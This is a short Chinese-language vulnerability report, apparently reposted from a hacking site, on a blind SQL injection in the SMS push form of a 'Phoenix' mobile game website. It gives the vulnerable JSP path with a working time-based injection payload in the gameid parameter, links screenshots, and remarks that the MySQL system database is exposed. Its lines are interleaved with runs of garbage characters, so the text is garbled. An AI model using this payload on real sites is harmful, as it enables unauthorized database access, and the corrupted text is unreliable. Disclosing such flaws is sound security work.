简要描述:9 ^* x& L$ }9 q0 ^, O: L8 P, `! ~
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
, j) p% u4 H8 V, v2 k
* b0 M& R+ u) S( i M, G详细说明:
: y( O! f" @. j$ {+ g m存在SQL盲注url:
5 J. r9 p- X- I n6 ~- ]fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1/ ]- s3 p4 V" \6 D2 U# ?
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
/ n# K& g6 W) ~1 ohttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
) S4 n7 [+ U# P/ d3 M; jhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg/ {4 A* N; k3 o( ~6 q: d; u
" b0 w& ]1 {, M& ^: e% |2 R8 z能看到mysql系统数据库,看来user权限应该很高的。。 |